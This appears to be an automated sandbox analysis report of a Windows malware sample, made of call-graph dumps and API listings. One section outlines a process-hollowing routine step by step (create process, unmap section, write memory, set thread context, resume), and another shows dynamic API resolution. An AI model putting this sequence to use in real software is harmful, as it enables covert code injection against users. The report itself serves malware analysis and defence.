54960->54985 54963 44f004 54963->54954 54966 44f047 54969 446802 _free 20 API calls 54966->54969 54969->54963 54970 44f042 55009 44062d 20 API calls _Atexit 54970->55009 54972 44f08b 54972->54966 55010 44ec42 20 API calls 54972->55010 54973 44f05f 54973->54972 54974 446802 _free 20 API calls 54973->54974 54974->54972 54977 44f103 ___scrt_is_nonwritable_in_current_image 54976->54977 54978 448295 _Atexit 36 API calls 54977->54978 54983 44f10d 54978->54983 54980 44f191 ___scrt_is_nonwritable_in_current_image 54980->54960 54983->54980 54984 446802 _free 20 API calls 54983->54984 55011 446175 36 API calls 4 library calls 54983->55011 55012 445909 EnterCriticalSection 54983->55012 55013 44f188 LeaveCriticalSection std::_Lockit::~_Lockit 54983->55013 54984->54983 54986 43a837 __cftoe 36 API calls 54985->54986 54987 44ed7e 54986->54987 54988 44ed8d GetOEMCP 54987->54988 54989 44ed9f 54987->54989 54990 44edb6 54988->54990 54989->54990 54991 44eda4 GetACP 54989->54991 54990->54963 54992 4461b8 54990->54992 54991->54990 54993 4461f6 54992->54993 54994 4461c6 ___crtLCMapStringA 54992->54994 55015 44062d 20 API calls _Atexit 54993->55015 54994->54993 54995 4461e1 RtlAllocateHeap 54994->54995 55014 443001 7 API calls 2 library calls 54994->55014 54995->54994 54997 4461f4 54995->54997 54997->54966 54999 44f199 54997->54999 55000 44ed6c 38 API calls 54999->55000 55003 44f1b8 55000->55003 55001 44f1bf 55002 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 55001->55002 55004 44f03a 55002->55004 55003->55001 55005 44f209 IsValidCodePage 55003->55005 55008 44f22e ___scrt_get_show_window_mode 55003->55008 55004->54970 55004->54973 55005->55001 55006 44f21b GetCPInfo 55005->55006 55006->55001 55006->55008 55016 44ee44 GetCPInfo 55008->55016 55009->54966 55010->54966 55011->54983 55012->54983 55013->54983 55014->54994 55015->54997 55017 44ef28 55016->55017 55021 44ee7e 55016->55021 55020 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 55017->55020 55023 44efd4 55020->55023 55026 4511ac 55021->55026 55023->55001 55025 44aee6 _swprintf 41 API calls 55025->55017 55027 43a837 __cftoe 36 API calls 55026->55027 55028 4511cc MultiByteToWideChar 55027->55028 55031 45120a 55028->55031 55038 4512a2 55028->55038 55030 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 55034 44eedf 55030->55034 55032 45122b __alloca_probe_16 ___scrt_get_show_window_mode 55031->55032 55033 4461b8 ___crtLCMapStringA 21 API calls 55031->55033 55035 45129c 55032->55035 55037 451270 MultiByteToWideChar 55032->55037 55033->55032 55040 44aee6 55034->55040 55045 435ecd 20 API calls _free 55035->55045 55037->55035 55039 45128c GetStringTypeW 55037->55039 55038->55030 55039->55035 55041 43a837 __cftoe 36 API calls 55040->55041 55042 44aef9 55041->55042 55046 44acc9 55042->55046 55045->55038 55047 44ace4 ___crtLCMapStringA 55046->55047 55048 44ad0a MultiByteToWideChar 55047->55048 55049 44ad34 55048->55049 55050 44aebe 55048->55050 55054 4461b8 ___crtLCMapStringA 21 API calls 55049->55054 55056 44ad55 __alloca_probe_16 55049->55056 55051 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 55050->55051 55052 44aed1 55051->55052 55052->55025 55053 44ad9e MultiByteToWideChar 55055 44adb7 55053->55055 55068 44ae0a 55053->55068 55054->55056 55073 448c33 55055->55073 55056->55053 55056->55068 55060 44ae19 55062 4461b8 ___crtLCMapStringA 21 API calls 55060->55062 55066 44ae3a __alloca_probe_16 55060->55066 55061 44ade1 55064 448c33 _strftime 11 API calls 55061->55064 55061->55068 55062->55066 55063 44aeaf 55081 435ecd 20 API calls _free 55063->55081 55064->55068 55066->55063 55067 448c33 _strftime 11 API calls 55066->55067 55069 44ae8e 55067->55069 55082 435ecd 20 API calls _free 55068->55082 55069->55063 55070 44ae9d WideCharToMultiByte 55069->55070 55070->55063 55071 44aedd 55070->55071 55083 435ecd 20 API calls _free 55071->55083 55074 44854a _Atexit 5 API calls 55073->55074 55075 448c5a 55074->55075 55078 448c63 55075->55078 55084 448cbb 10 API calls 3 library calls 55075->55084 55077 448ca3 LCMapStringW 55077->55078 55079 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 55078->55079 55080 448cb5 55079->55080 55080->55060 55080->55061 55080->55068 55081->55068 55082->55050 55083->55068 55084->55077 55086 41cc20 LoadLibraryA GetProcAddress 55085->55086 55087 41cc10 GetModuleHandleA GetProcAddress 55085->55087 55088 41cc49 44 API calls 55086->55088 55089 41cc39 LoadLibraryA GetProcAddress 55086->55089 55087->55086 55088->54609 55089->55088 55394 41b539 FindResourceA 55090->55394 55093 43bda0 _Yarn 21 API calls 55094 40f428 ctype 55093->55094 55095 4020b7 28 API calls 55094->55095 55096 40f443 55095->55096 55097 401fe2 28 API calls 55096->55097 55098 40f44e 55097->55098 55099 401fd8 11 API calls 55098->55099 55100 40f457 55099->55100 55101 43bda0 _Yarn 21 API calls 55100->55101 55102 40f468 ctype 55101->55102 55397 406e13 55102->55397 55104 40f49b 55104->54611 55106 40fb5e 55105->55106 55108 40fb65 55105->55108 55400 402163 11 API calls 55106->55400 55108->54619 55401 401fab 55109->55401 55290->54626 55291->54635 55292->54639 55295 4020df 11 API calls 55294->55295 55296 406c65 55295->55296 55297 4032a0 28 API calls 55296->55297 55298 406c82 55297->55298 55298->54660 55300 40ebdf 55299->55300 55301 4135ae RegQueryValueExA RegCloseKey 55299->55301 55300->54657 55300->54674 55301->55300 55302->54665 55392->54684 55395 41b556 LoadResource LockResource SizeofResource 55394->55395 55396 40f419 55394->55396 55395->55396 55396->55093 55398 4020b7 28 API calls 55397->55398 55399 406e27 55398->55399 55399->55104 55400->55108 55714 4129da 55715 4129ec 55714->55715 55716 4041a2 28 API calls 55715->55716 55717 4129ff 55716->55717 55718 4020f6 28 API calls 55717->55718 55719 412a0e 55718->55719 55720 4020f6 28 API calls 55719->55720 55721 412a1d 55720->55721 55722 41beac 28 API calls 55721->55722 55723 412a26 55722->55723 55724 412ace 55723->55724 55726 401e65 22 API calls 55723->55726 55725 401e8d 11 API calls 55724->55725 55727 412ad7 55725->55727 55728 412a3d 55726->55728 55729 401fd8 11 API calls 55727->55729 55730 4020f6 28 API calls 55728->55730 55731 412ae0 55729->55731 55732 412a48 55730->55732 55733 401fd8 11 API calls 55731->55733 55734 401e65 22 API calls 55732->55734 55735 412ae8 55733->55735 55736 412a53 55734->55736 55737 4020f6 28 API calls 55736->55737 55738 412a5e 55737->55738 55739 401e65 22 API calls 55738->55739 55740 412a69 55739->55740 55741 4020f6 28 API calls 55740->55741 55742 412a74 55741->55742 55743 401e65 22 API calls 55742->55743 55744 412a7f 55743->55744 55745 4020f6 28 API calls 55744->55745 55746 412a8a 55745->55746 55747 401e65 22 API calls 55746->55747 55748 412a95 55747->55748 55749 4020f6 28 API calls 55748->55749 55750 412aa0 55749->55750 55751 401e65 22 API calls 55750->55751 55752 412aae 55751->55752 55753 4020f6 28 API calls 55752->55753 55754 412ab9 55753->55754 55758 412aef GetModuleFileNameW 55754->55758 55757 404e26 99 API calls 55757->55724 55759 4020df 11 API calls 55758->55759 55760 412b1a 55759->55760 55761 4020df 11 API calls 55760->55761 55762 412b26 55761->55762 55763 4020df 11 API calls 55762->55763 55785 412b32 55763->55785 55764 40da23 32 API calls 55764->55785 55765 401fd8 11 API calls 55765->55785 55766 41ba09 43 API calls 55766->55785 55767 4185a3 31 API calls 55767->55785 55768 412c58 Sleep 55768->55785 55769 40417e 28 API calls 55769->55785 55770 4042fc 84 API calls 55770->55785 55771 40431d 28 API calls 55771->55785 55772 401f09 11 API calls 55772->55785 55773 412cfa Sleep 55773->55785 55774 403014 28 API calls 55774->55785 55775 412d9c Sleep 55775->55785 55776 41c516 32 API calls 55776->55785 55777 412dff DeleteFileW 55777->55785 55778 412e36 DeleteFileW 55778->55785 55779 412e88 Sleep 55779->55785 55780 412e72 DeleteFileW 55780->55785 55781 412f01 55782 401f09 11 API calls 55781->55782 55783 412f0d 55782->55783 55784 401f09 11 API calls 55783->55784 55786 412f19 55784->55786 55785->55764 55785->55765 55785->55766 55785->55767 55785->55768 55785->55769 55785->55770 55785->55771 55785->55772 55785->55773 55785->55774 55785->55775 55785->55776 55785->55777 55785->55778 55785->55779 55785->55780 55785->55781 55789 412ecd Sleep 55785->55789 55787 401f09 11 API calls 55786->55787 55788 412f25 55787->55788 55790 40b93f 28 API calls 55788->55790 55791 401f09 11 API calls 55789->55791 55792 412f38 55790->55792 55796 412edd 55791->55796 55794 4020f6 28 API calls 55792->55794 55793 401f09 11 API calls 55793->55796 55795 412f58 55794->55795 55905 413268 55795->55905 55796->55785 55796->55793 55797 412eff 55796->55797 55797->55788 55800 401f09 11 API calls 55801 412f6f 55800->55801 55802 4130e3 55801->55802 55803 412f8f 55801->55803 55804 41bdaf 28 API calls 55802->55804 55805 41bdaf 28 API calls 55803->55805 55806 4130ec 55804->55806 55807 412f9b 55805->55807 55808 402f31 28 API calls 55806->55808 55809 41bc1f 28 API calls 55807->55809 55810 413123 55808->55810 55811 412fb5 55809->55811 55812 402f10 28 API calls 55810->55812 55813 402f31 28 API calls 55811->55813 55814 413132 55812->55814 55815 412fe5 55813->55815 55816 402f10 28 API calls 55814->55816 55817 402f10 28 API calls 55815->55817 55818 41313e 55816->55818 55819 412ff4 55817->55819 55820 402f10 28 API calls 55818->55820 55821 402f10 28 API calls 55819->55821 55822 41314d 55820->55822 55823 413003 55821->55823 55824 402f10 28 API calls 55822->55824 55825 402f10 28 API calls 55823->55825 55827 41315c 55824->55827 55826 413012 55825->55826 55829 402f10 28 API calls 55826->55829 55828 402f10 28 API calls 55827->55828 55830 41316b 55828->55830 55831 413021 55829->55831 55832 402f10 28 API calls 55830->55832 55833 402f10 28 API calls 55831->55833 55834 41317a 55832->55834 55835 41302d 55833->55835 55836 402ea1 28 API calls 55834->55836 55837 402f10 28 API calls 55835->55837 55838 413184 55836->55838 55839 413039 55837->55839 55840 404aa1 61 API calls 55838->55840 55841 402ea1 28 API calls 55839->55841 55842 413191 55840->55842 55843 413048 55841->55843 55844 401fd8 11 API calls 55842->55844 55845 402f10 28 API calls 55843->55845 55846 41319d 55844->55846 55847 413054 55845->55847 55848 401fd8 11 API calls 55846->55848 55849 402ea1 28 API calls 55847->55849 55850 4131a9 55848->55850 55851 41305e 55849->55851 55852 401fd8 11 API calls 55850->55852 55853 404aa1 61 API calls 55851->55853 55854 4131b5 55852->55854 55855 41306b 55853->55855 55856 401fd8 11 API calls 55854->55856 55857 401fd8 11 API calls 55855->55857 55859 4131c1 55856->55859 55858 413074 55857->55858 55861 401fd8 11 API calls 55858->55861 55860 401fd8 11 API calls 55859->55860 55862 4131ca 55860->55862 55863 41307d 55861->55863 55864 401fd8 11 API calls 55862->55864 55865 401fd8 11 API calls 55863->55865 55866 4131d3 55864->55866 55867 413086 55865->55867 55868 401fd8 11 API calls 55866->55868 55869 401fd8 11 API calls 55867->55869 55870 4130d7 55868->55870 55871 41308f 55869->55871 55873 401fd8 11 API calls 55870->55873 55872 401fd8 11 API calls 55871->55872 55874 41309b 55872->55874 55875 4131e5 55873->55875 55876 401fd8 11 API calls 55874->55876 55877 401f09 11 API calls 55875->55877 55878 4130a7 55876->55878 55879 4131f1 55877->55879 55880 401fd8 11 API calls 55878->55880 55881 401fd8 11 API calls 55879->55881 55882 4130b3 55880->55882 55883 4131fd 55881->55883 55884 401fd8 11 API calls 55882->55884 55885 401fd8 11 API calls 55883->55885 55886 4130bf 55884->55886 55887 413209 55885->55887 55888 401fd8 11 API calls 55886->55888 55890 401fd8 11 API calls 55887->55890 55889 4130cb 55888->55889 55892 401fd8 11 API calls 55889->55892 55891 413215 55890->55891 55893 401fd8 11 API calls 55891->55893 55892->55870 55894 413221 55893->55894 55895 401fd8 11 API calls 55894->55895 55896 41322d 55895->55896 55897 401fd8 11 API calls 55896->55897 55898 413239 55897->55898 55899 401fd8 11 API calls 55898->55899 55900 413245 55899->55900 55901 401fd8 11 API calls 55900->55901 55902 413251 55901->55902 55903 401fd8 11 API calls 55902->55903 55904 412abe 55903->55904 55904->55757 55906 4132a6 55905->55906 55908 413277 55905->55908 55907 4132b5 55906->55907 55917 10001c5b 55906->55917 55909 40417e 28 API calls 55907->55909 55921 411d2d 55908->55921 55911 4132c1 55909->55911 55913 401fd8 11 API calls 55911->55913 55915 412f63 55913->55915 55915->55800 55918 10001c6b ___scrt_fastfail 55917->55918 55925 100012ee 55918->55925 55920 10001c87 55920->55907 55967 411d39 55921->55967 55924 411fa2 22 API calls _Yarn 55924->55906 55926 10001324 ___scrt_fastfail 55925->55926 55927 100013b7 GetEnvironmentVariableW 55926->55927 55951 100010f1 55927->55951 55930 100010f1 51 API calls 55931 10001465 55930->55931 55932 100010f1 51 API calls 55931->55932 55933 10001479 55932->55933 55934 100010f1 51 API calls 55933->55934 55935 1000148d 55934->55935 55936 100010f1 51 API calls 55935->55936 55937 100014a1 55936->55937 55938 100010f1 51 API calls 55937->55938 55939 100014b5 lstrlenW 55938->55939 55940 100014d2 55939->55940 55941 100014d9 lstrlenW 55939->55941 55940->55920 55942 100010f1 51 API calls 55941->55942 55943 10001501 lstrlenW lstrcatW 55942->55943 55944 100010f1 51 API calls 55943->55944 55945 10001539 lstrlenW lstrcatW 55944->55945 55946 100010f1 51 API calls 55945->55946 55947 1000156b lstrlenW lstrcatW 55946->55947 55948 100010f1 51 API calls 55947->55948 55949 1000159d lstrlenW lstrcatW 55948->55949 55950 100010f1 51 API calls 55949->55950 55950->55940 55952 10001118 ___scrt_fastfail 55951->55952 55953 10001129 lstrlenW 55952->55953 55964 10002c40 55953->55964 55955 10001148 lstrcatW lstrlenW 55956 10001177 lstrlenW FindFirstFileW 55955->55956 55957 10001168 lstrlenW 55955->55957 55958 100011a0 55956->55958 55959 100011e1 55956->55959 55957->55956 55960 100011c7 FindNextFileW 55958->55960 55961 100011aa 55958->55961 55959->55930 55960->55958 55963 100011da FindClose 55960->55963 55961->55960 55966 10001000 51 API calls ___scrt_fastfail 55961->55966 55963->55959 55965 10002c57 55964->55965 55965->55955 55965->55965 55966->55961 56002 4117d7 55967->56002 55969 411d57 55970 411d6d SetLastError 55969->55970 55971 4117d7 SetLastError 55969->55971 55998 411d35 55969->55998 55970->55998 55972 411d8a 55971->55972 55972->55970 55974 411dac GetNativeSystemInfo 55972->55974 55972->55998 55975 411df2 55974->55975 55987 411dff SetLastError 55975->55987 56005 411cde VirtualAlloc 55975->56005 55978 411e22 55979 411e47 GetProcessHeap HeapAlloc 55978->55979 56031 411cde VirtualAlloc 55978->56031 55981 411e70 55979->55981 55982 411e5e 55979->55982 55983 4117d7 SetLastError 55981->55983 56032 411cf5 VirtualFree 55982->56032 55986 411eb9 55983->55986 55984 411e3a 55984->55979 55984->55987 55988 411f6b 55986->55988 56006 411cde VirtualAlloc 55986->56006 55987->55998 56033 4120b2 GetProcessHeap HeapFree 55988->56033 55991 411ed2 ctype 56007 4117ea 55991->56007 55993 411efe 55993->55988 56011 411b9a 55993->56011 55997 411f36 55997->55988 55997->55998 56027 1000220c 55997->56027 55998->55924 55999 411f5c 55999->55998 56000 411f60 SetLastError 55999->56000 56000->55988 56003 4117e6 56002->56003 56004 4117db SetLastError 56002->56004 56003->55969 56004->55969 56005->55978 56006->55991 56008 4118c0 56007->56008 56009 411816 ctype ___scrt_get_show_window_mode 56007->56009 56008->55993 56009->56008 56010 4117d7 SetLastError 56009->56010 56010->56009 56012 411ca5 56011->56012 56013 411bbb IsBadReadPtr 56011->56013 56012->55988 56021 41198a 56012->56021 56013->56012 56016 411bd5 56013->56016 56016->56012 56017 411cbd SetLastError 56016->56017 56018 411ca7 SetLastError 56016->56018 56019 411c8a IsBadReadPtr 56016->56019 56034 440f5d 56016->56034 56017->56012 56018->56012 56019->56012 56019->56016 56025 4119b0 56021->56025 56022 411a99 56023 4118ed VirtualProtect 56022->56023 56024 411aab 56023->56024 56024->55997 56025->56022 56025->56024 56049 4118ed 56025->56049 56028 10002215 56027->56028 56029 1000221a dllmain_dispatch 56027->56029 56053 100022b1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 56028->56053 56029->55999 56031->55984 56032->55987 56033->55998 56035 446206 56034->56035 56036 446213 56035->56036 56037 44621e 56035->56037 56038 4461b8 ___crtLCMapStringA 21 API calls 56036->56038 56039 446226 56037->56039 56045 44622f ___crtLCMapStringA 56037->56045 56043 44621b 56038->56043 56040 446802 _free 20 API calls 56039->56040 56040->56043 56041 446234 56047 44062d 20 API calls _Atexit 56041->56047 56042 446259 RtlReAllocateHeap 56042->56043 56042->56045 56043->56016 56045->56041 56045->56042 56048 443001 7 API calls 2 library calls 56045->56048 56047->56043 56048->56045 56050 4118fe 56049->56050 56052 4118f6 56049->56052 56051 411971 VirtualProtect 56050->56051 56050->56052 56051->56052 56052->56025 56053->56029 56054 42f97e 56055 42f989 56054->56055 56056 42f99d 56055->56056 56058 432f7f 56055->56058 56059 432f8a 56058->56059 56060 432f8e 56058->56060 56059->56056 56061 440f5d 22 API calls 56060->56061 56061->56059 56062 40165e 56063 401666 56062->56063 56064 401669 56062->56064 56065 4016a8 56064->56065 56067 401696 56064->56067 56066 43455e new 22 API calls 56065->56066 56068 40169c 56066->56068 56069 43455e new 22 API calls 56067->56069 56069->56068 56070 426cdc 56075 426d59 send 56070->56075 56076 10001f3f 56077 10001f4b ___DestructExceptionObject 56076->56077 56094 1000247c 56077->56094 56079 10001f52 56080 10002041 56079->56080 56081 10001f7c 56079->56081 56086 10001f57 ___scrt_is_nonwritable_in_current_image 56079->56086 56110 10002639 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 56080->56110 56105 100023de IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 56081->56105 56084 10002048 56085 10001f8b __RTC_Initialize 56085->56086 56106 100022fc RtlInitializeSListHead 56085->56106 56088 10001f99 ___scrt_initialize_default_local_stdio_options 56107 100046c5 5 API calls _ValidateLocalCookies 56088->56107 56090 10001fad 56090->56086 56108 100023b3 IsProcessorFeaturePresent ___isa_available_init ___scrt_release_startup_lock 56090->56108 56092 10001fb8 56092->56086 56109 10004669 5 API calls _ValidateLocalCookies 56092->56109 56095 10002485 56094->56095 56111 10002933 IsProcessorFeaturePresent 56095->56111 56097 10002491 56112 100034ea 56097->56112 56099 10002496 56104 1000249a 56099->56104 56121 100053c8 56099->56121 56101 100024b1 56101->56079 56104->56079 56105->56085 56106->56088 56107->56090 56108->56092 56109->56086 56110->56084 56111->56097 56113 100034ef ___vcrt_initialize_winapi_thunks 56112->56113 56125 10003936 6 API calls 2 library calls 56113->56125 56115 100034f9 56116 100034fd 56115->56116 56126 100038e8 56115->56126 56116->56099 56118 10003505 56119 10003510 56118->56119 56134 10003972 RtlDeleteCriticalSection 56118->56134 56119->56099 56153 10007457 56121->56153 56124 10003529 7 API calls 3 library calls 56124->56104 56125->56115 56135 10003af1 56126->56135 56130 1000390b 56131 10003918 56130->56131 56141 1000391b 5 API calls ___vcrt_FlsFree 56130->56141 56131->56118 56133 100038fd 56133->56118 56134->56116 56142 10003a82 56135->56142 56137 10003b0b 56138 10003b24 TlsAlloc 56137->56138 56139 100038f2 56137->56139 56139->56133 56140 10003ba2 5 API calls try_get_function 56139->56140 56140->56130 56141->56133 56143 10003aaa 56142->56143 56145 10003aa6 __crt_fast_encode_pointer 56142->56145 56143->56145 56146 100039be 56143->56146 56145->56137 56148 100039cd try_get_first_available_module 56146->56148 56147 100039ea LoadLibraryExW 56147->56148 56149 10003a05 GetLastError 56147->56149 56148->56147 56150 10003a60 FreeLibrary 56148->56150 56151 10003a77 56148->56151 56152 10003a38 LoadLibraryExW 56148->56152 56149->56148 56150->56148 56151->56145 56152->56148 56156 10007470 56153->56156 56154 10002ada _ValidateLocalCookies 5 API calls 56155 100024a3 56154->56155 56155->56101 56155->56124 56156->56154 56157 10005bff 56165 10005d5c 56157->56165 56159 10005c13 56162 10005c1b 56163 10005c28 56162->56163 56173 10005c2b 10 API calls 56162->56173 56166 10005c45 _abort 4 API calls 56165->56166 56167 10005d83 56166->56167 56168 10005d9b TlsAlloc 56167->56168 56169 10005d8c 56167->56169 56168->56169 56170 10002ada _ValidateLocalCookies 5 API calls 56169->56170 56171 10005c09 56170->56171 56171->56159 56172 10005b7a 19 API calls 2 library calls 56171->56172 56172->56162 56173->56159

                          Executed Functions

                          Function 0041CBE1 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                          • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                          • LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                          • LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                          • LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                          • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                          • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                          • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                          • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD17
                          • LoadLibraryA.KERNEL32(kernel32), ref: 0041CD28
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD2B
                          • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
                          • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD4B
                          • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD5D
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD60
                          • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD6D
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD70
                          • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD84
                          • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD98
                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDBA
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDBD
                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDCA
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDCD
                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDDA
                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDDD
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad$HandleModule
                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                          • API String ID: 4236061018-3687161714
                          • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                          • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                          • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                          • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE
                          Function 0041812A Relevance: 59.8, APIs: 29, Strings: 5, Instructions: 289nativelibraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 448 41812a-418153 449 418157-4181be GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 448->449 450 4181c4-4181cb 449->450 451 4184bb 449->451 450->451 453 4181d1-4181d8 450->453 452 4184bd-4184c7 451->452 453->451 454 4181de-4181e0 453->454 454->451 455 4181e6-418213 call 436f10 * 2 454->455 455->451 460 418219-418224 455->460 460->451 461 41822a-41825a CreateProcessW 460->461 462 418260-418288 VirtualAlloc GetThreadContext 461->462 463 4184b5 GetLastError 461->463 464 41847f-4184b3 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->464 465 41828e-4182ae ReadProcessMemory 462->465 463->451 464->451 465->464 466 4182b4-4182d6 NtCreateSection 465->466 466->464 467 4182dc-4182e9 466->467 468 4182eb-4182f6 NtUnmapViewOfSection 467->468 469 4182fc-41831e NtMapViewOfSection 467->469 468->469 470 418320-41835d VirtualFree NtClose TerminateProcess 469->470 471 418368-41838f GetCurrentProcess NtMapViewOfSection 469->471 470->449 472 418363 470->472 471->464 473 418395-418399 471->473 472->451 474 4183a2-4183c0 call 436990 473->474 475 41839b-41839f 473->475 478 418402-41840b 474->478 479 4183c2-4183d0 474->479 475->474 480 41842b-41842f 478->480 481 41840d-418413 478->481 482 4183d2-4183f5 call 436990 479->482 484 418431-41844e WriteProcessMemory 480->484 485 418454-41846b SetThreadContext 480->485 481->480 483 418415-418428 call 41853e 481->483 491 4183f7-4183fe 482->491 483->480 484->464 489 418450 484->489 485->464 490 41846d-418479 ResumeThread 485->490 489->485 490->464 493 41847b-41847d 490->493 491->478 493->452
                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                          • GetProcAddress.KERNEL32(00000000), ref: 00418174
                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                          • GetProcAddress.KERNEL32(00000000), ref: 00418188
                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
